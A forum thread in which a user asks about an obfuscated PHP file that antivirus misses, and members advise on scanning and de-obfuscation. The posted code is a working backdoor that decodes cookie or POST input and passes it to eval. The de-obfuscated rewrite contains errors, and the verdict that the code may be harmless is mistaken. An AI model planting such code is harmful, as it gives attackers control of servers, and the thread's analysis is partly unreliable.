• Important: We recently upgraded our forum software - please let us know if you run into any issues.

Wirus

become

New Member
Hello. I see php files looks like wirus.

the content of this file is:

Code:
<?php

$sjzwewe = '_cv3r64o7es0892#tuHdxbp-k5nmy\'gal*i';$qgrywj = Array();$qgrywj[] = $sjzwewe[18].$sjzwewe[33];$qgrywj[] = $sjzwewe[1].$sjzwewe[31].$sjzwewe[9].$sjzwewe[19].$sjzwewe[8].$sjzwewe[3].$sjzwewe[1].$sjzwewe[1].$sjzwewe[23].$sjzwewe[25].$sjzwewe[14].$sjzwewe[1].$sjzwewe[25].$sjzwewe[23].$sjzwewe[6].$sjzwewe[1].$sjzwewe[13].$sjzwewe[31].$sjzwewe[23].$sjzwewe[21].$sjzwewe[5].$sjzwewe[13].$sjzwewe[6].$sjzwewe[23].$sjzwewe[14].$sjzwewe[19].$sjzwewe[6].$sjzwewe[21].$sjzwewe[19].$sjzwewe[3].$sjzwewe[11].$sjzwewe[1].$sjzwewe[12].$sjzwewe[21].$sjzwewe[21].$sjzwewe[19];$qgrywj[] = $sjzwewe[15];$qgrywj[] = $sjzwewe[1].$sjzwewe[7].$sjzwewe[17].$sjzwewe[26].$sjzwewe[16];$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[0].$sjzwewe[4].$sjzwewe[9].$sjzwewe[22].$sjzwewe[9].$sjzwewe[31].$sjzwewe[16];$qgrywj[] = $sjzwewe[9].$sjzwewe[20].$sjzwewe[22].$sjzwewe[32].$sjzwewe[7].$sjzwewe[19].$sjzwewe[9];$qgrywj[] = $sjzwewe[10].$sjzwewe[17].$sjzwewe[21].$sjzwewe[10].$sjzwewe[16].$sjzwewe[4];$qgrywj[] = $sjzwewe[31].$sjzwewe[4].$sjzwewe[4].$sjzwewe[31].$sjzwewe[28].$sjzwewe[0].$sjzwewe[27].$sjzwewe[9].$sjzwewe[4].$sjzwewe[30].$sjzwewe[9];$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[32].$sjzwewe[9].$sjzwewe[26];$qgrywj[] = $sjzwewe[22].$sjzwewe[31].$sjzwewe[1].$sjzwewe[24];foreach ($qgrywj[7]($_COOKIE, $_POST) as $txsfwcl => $mhbtlou){function xvidonr($qgrywj, $txsfwcl, $pcvfru){return $qgrywj[6]($qgrywj[4]($txsfwcl . $qgrywj[1], ($pcvfru / $qgrywj[8]($txsfwcl)) + 1), 0, $pcvfru);}function xtddq($qgrywj, $xrsscmu){return @$qgrywj[9]($qgrywj[0], $xrsscmu);}function lqzmlux($qgrywj, $xrsscmu){$mzvrgh = $qgrywj[3]($xrsscmu) % 3;if (!$mzvrgh) {eval($xrsscmu[1]($xrsscmu[2]));exit();}}$mhbtlou = xtddq($qgrywj, $mhbtlou);lqzmlux($qgrywj, $qgrywj[5]($qgrywj[2], $mhbtlou ^ xvidonr($qgrywj, $txsfwcl, $qgrywj[8]($mhbtlou))));}

I use clamav and rkhunter but non off them recognize this infected file. Is there any other software which can remove this fie or mark as infected ?
 
Last edited by a moderator:


Rob

Administrator
Staff member
Ok - and who owns the files? root or the individual users? I'd def say you have something going on there.. and would recommend installing cxs and running a scan. It'd go through and find anything else that was installed and quarantine them.

If you don't go the cxs route, look at the file owners and the timestamp of them all, then find other files that were created at the same time.
 

JasKinasis

Well-Known Member
Looking at the code you've posted - the scripts are blatantly obfuscated.

It's possible that they could have been placed there by an intruder, or it could be some php module that your system uses which is generating these scripts on a per-user basis.

I have tried to de-obfuscate what I can.
First I had to identify where each line ended. So I split based on things like curly braces {} and semicolons ; and searched for any keywords - like "function"

After that things became a little clearer.

Here's the script with some spacing added - and a few of my own comments:
Code:
<?php

# character array
$sjzwewe = '_cv3r64o7es0892#tuHdxbp-k5nmy\'gal*i';

# array of strings
$qgrywj = Array();

# populate array of strings using characters from character array
$qgrywj[] = $sjzwewe[18].$sjzwewe[33];
$qgrywj[] = $sjzwewe[1].$sjzwewe[31].$sjzwewe[9].$sjzwewe[19].$sjzwewe[8].$sjzwewe[3].$sjzwewe[1].$sjzwewe[1].$sjzwewe[23].$sjzwewe[25].$sjzwewe[14].$sjzwewe[1].$sjzwewe[25].$sjzwewe[23].$sjzwewe[6].$sjzwewe[1].$sjzwewe[13].$sjzwewe[31].$sjzwewe[23].$sjzwewe[21].$sjzwewe[5].$sjzwewe[13].$sjzwewe[6].$sjzwewe[23].$sjzwewe[14].$sjzwewe[19].$sjzwewe[6].$sjzwewe[21].$sjzwewe[19].$sjzwewe[3].$sjzwewe[11].$sjzwewe[1].$sjzwewe[12].$sjzwewe[21].$sjzwewe[21].$sjzwewe[19];
$qgrywj[] = $sjzwewe[15];
$qgrywj[] = $sjzwewe[1].$sjzwewe[7].$sjzwewe[17].$sjzwewe[26].$sjzwewe[16];
$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[0].$sjzwewe[4].$sjzwewe[9].$sjzwewe[22].$sjzwewe[9].$sjzwewe[31].$sjzwewe[16];
$qgrywj[] = $sjzwewe[9].$sjzwewe[20].$sjzwewe[22].$sjzwewe[32].$sjzwewe[7].$sjzwewe[19].$sjzwewe[9];
$qgrywj[] = $sjzwewe[10].$sjzwewe[17].$sjzwewe[21].$sjzwewe[10].$sjzwewe[16].$sjzwewe[4];
$qgrywj[] = $sjzwewe[31].$sjzwewe[4].$sjzwewe[4].$sjzwewe[31].$sjzwewe[28].$sjzwewe[0].$sjzwewe[27].$sjzwewe[9].$sjzwewe[4].$sjzwewe[30].$sjzwewe[9];
$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[32].$sjzwewe[9].$sjzwewe[26];
$qgrywj[] = $sjzwewe[22].$sjzwewe[31].$sjzwewe[1].$sjzwewe[24];

# Now the script starts doing things using the strings generated above
foreach ($qgrywj[7]($_COOKIE, $_POST) as $txsfwcl => $mhbtlou)
{
    function xvidonr($qgrywj, $txsfwcl, $pcvfru)
    {
        return $qgrywj[6]($qgrywj[4]($txsfwcl . $qgrywj[1], ($pcvfru / $qgrywj[8]($txsfwcl)) + 1), 0, $pcvfru);
    }

    function xtddq($qgrywj, $xrsscmu)
    {
        return @$qgrywj[9]($qgrywj[0], $xrsscmu);
    }
 
    function lqzmlux($qgrywj, $xrsscmu)
    {
        $mzvrgh = $qgrywj[3]($xrsscmu) % 3;
        if (!$mzvrgh)
        {
            eval($xrsscmu[1]($xrsscmu[2]));
            exit();
        }
    }
 
    $mhbtlou = xtddq($qgrywj, $mhbtlou);
    lqzmlux($qgrywj, $qgrywj[5]($qgrywj[2], $mhbtlou ^ xvidonr($qgrywj, $txsfwcl, $qgrywj[8]($mhbtlou))));
}

The initial part of the script which you posted sets up what looks like a random string, but then underneath it is populating an array of strings with concatenated characters taken from the character array.

I quickly wrote a python script to analyse the strings that are generated in the block of code under the character array...
deObfuscate.py:
Code:
#!/usr/bin/env python3

def TranslateLists(indicesLists):
    # character array from suspect php code
    characters = ['_','c','v','3','r','6','4','o','7','e','s','0','8','9','2','#','t','u','H','d','x','b','p','-','k', '5', 'n', 'm', 'y', '\'', 'g', 'a', 'l', '*', 'i']
    for indicesList in indicesLists:
        stringout=""
        for index in indicesList:
            stringout += characters[index]
        print(stringout)

# Pass the function the indices used in the block
# of code which set up the string array $qgrywj[]
TranslateLists([[18,33],
                [1,31,9,19,8,3,1,1,23,25,14,1,25,23,6,1,13,31,23,21,5,13,6,23,14,19,6,21,19,3,11,1,12,21,21,19],
                [15],
                [1,7,17,26,16],
                [10,16,4,0,4,9,22,9,31,16],
                [9,20,22,32,7,19,9],
                [10,17,21,10,16,4],
                [31,4,4,31,28,0,27,9,4,30,9],
                [10,16,4,32,9,26],
                [22,31,1,24]])

Which yielded the following results:
Code:
H*
caed73cc-52c5-4c9a-b694-2d4bd30c8bbd
#
count
str_repeat
explode
substr
array_merge
strlen
pack
And using that we can deduce that anything that refers to any part of $qgrywj[] refers to one of the above strings.
If it is indexed. e.g. $qgrywj[5] then it refers to a single string in the list. so index 5 would be the explode function. If no indices are after $qgrywj - it means that it is referring to the entire list of strings.
So in some of the function calls, It means that the list of strings is passed into the function and then calls inside the function will use individual commands/operands stored in the list of strings.

So de-obfuscating what we can - the code snippet you posted looks like this:
Code:
<?php

$character_list = '_cv3r64o7es0892#tuHdxbp-k5nmy\'gal*i';

$string_list = Array();
$string_list[] = "H*";                                   #string_list index 0
$string_list[] = "caed73cc-52c5-4c9a-b694-2d4bd30c8bbd"; #index 1
$string_list[] = "#";                                    #index 2
$string_list[] = "count";                                #index 3
$string_list[] = "str_repeat";                           #index 4
$string_list[] = "explode";                              #index 5
$string_list[] = "substr";                               #index 6
$string_list[] = "array_merge";                          #index 7
$string_list[] = "strlen";                               #index 8
$string_list[] = "pack";                                 #index 9

foreach ( array_merge($_COOKIE, $_POST) as $txsfwct => $mhbtlou)
{
    function xvidonr($string_list, $txsfwcl, $pcvfru)
    {
        return substr(str_repeat($txsfwcl . "caed73cc-52c5-4c9a-b694-2d4bd30c8bbd"
($pcvfru / strlen($txsfwcl)) + 1), 0, $pcvfru);
    }

    function xtddq($string_list, $xrsscmu)
    {
        return @pack("H*", $xrsscmu);
    }

    function lqzmlux($string_list, $xrsscmu)
    {
        $mzvrgh = $count($xrsscmu) % 3;
        if (!$mzvrgh)
        {
        eval($xrsscmu[1]($xrsscmu[2]));
            exit();
        }
    }

    $mhbtlou = xtddq($string_list, $mhbtlou);
    lqzmlux($string_list, explode("H*", $mhbtlou ^ xvidonr($string_list, $txsfwcl, strlen($mhbtlou))));

}

There are a few things that are still obfuscated in there, so I'm guessing you only posted the first few lines of one of the files.
But so far I can't tell whether it is doing anything nasty or not because we only have part of the picture.

Also, some of the above might not necessarily be valid PHP - I haven't done any PHP for a long time.
I've just substituted in what I can see, so you can see what it's doing. So I can't vouch for the correctness of the code, but it does at least help to build a picture of what the code is doing. So the code above should be treated as pseudo-code!

This could be some proprietary php module that you have installed which has generated some obfuscated code. Or it could be malware. For now - the jury is still out!
 
Last edited:

Members online

No members online now.


Top